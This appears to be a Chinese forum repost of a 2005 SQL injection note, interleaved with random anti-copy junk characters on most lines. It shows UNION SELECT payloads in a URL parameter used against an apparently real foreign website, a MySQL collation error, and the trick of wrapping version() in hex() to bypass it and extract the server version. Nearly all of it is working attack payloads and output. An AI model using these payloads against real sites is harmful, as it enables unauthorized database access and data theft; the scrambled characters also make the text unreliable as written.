本文作者:SuperHei$ F" Q0 S2 f& Y. i" x
文章性质:原创. E, W; p# E/ I7 T% k
发布日期:2005-10-189 C" G6 r. w! Q; f- N+ d0 A
测试个国外的站时:$ v" u. Q: ? j
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*8 r- c2 Q* v6 D, c g- ~
返回错误:
/ S3 w0 P$ b0 D+ T) ]Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
1 S) g4 u: _6 v4 ]MySQL Error No. 126
$ z% ~0 V0 p8 c, A: L& g看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。6 Z3 L3 a" k M& ]: B) f
解决办法:转为其他编码如hex。
# ]! b2 g% `' j+ n" s( A0 `url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*' t" ^) A! z9 C2 X: r3 k z
成功得到hex(version())的值为:+ y6 U. O2 O( i* }8 ]- r' H
342E312E332D62657461 E* {( i$ M7 @
回Mysql查询下得到:
6 A% N: j0 w! @5 U( N2 f) j0 Nmysql> select 0x342E312E332D62657461;; o$ N- \% B: E. m/ O8 J
+------------------------+
_6 R/ m/ A G2 C" g| 0x342E312E332D62657461 |9 g# N# D; R0 [7 M+ G
+------------------------+
+ e: Y# L, [, b S% w4 C| 4.1.3-beta |* H+ ]8 N* J' Y3 [4 r. `2 V4 z$ H
+------------------------+
$ a9 |3 K2 \( z0 T! P, e' ]# \1 row in set (0.00 sec)
% T% v2 A" P# u" q
3 L. ^6 S* T3 A! t4 J: y |
发表于 2012-9-15 14:04:54
收藏
支持
反对